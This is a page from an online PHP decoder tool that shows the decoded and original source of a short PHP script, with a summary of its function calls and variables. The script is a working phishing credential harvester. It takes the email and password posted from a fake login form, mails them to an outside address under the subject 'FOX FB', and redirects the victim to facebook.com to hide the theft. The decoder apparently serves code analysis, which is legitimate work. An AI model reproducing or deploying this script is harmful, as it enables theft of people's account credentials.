Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $Email = $_POST['Email']; $Passwd = $_POST ['Passwd']; $to = "[email protected]..

Decoded Output download

<?php 
$Email = $_POST['Email']; 
$Passwd = $_POST ['Passwd']; 
$to = "[email protected]"; 
mail ("$to","FOX FB","Passwd:$Passwd","Mail is:$Email"); 
echo'</head><META http-equiv="refresh" content="0;URL=https://www.facebook.com/"><body></html>'; 
?> 
 
 

Did this file decode correctly?

Original Code

<?php
$Email = $_POST['Email'];
$Passwd = $_POST ['Passwd'];
$to = "[email protected]";
mail ("$to","FOX FB","Passwd:$Passwd","Mail is:$Email");
echo'</head><META http-equiv="refresh" content="0;URL=https://www.facebook.com/"><body></html>';
?>


Function Calls

mail 1

Variables

$to [email protected]
$Email None
$Passwd None

Stats

MD5 2d442c7dcf7b932de03c7e65ae7362b0
Eval Count 0
Decode Time 94 ms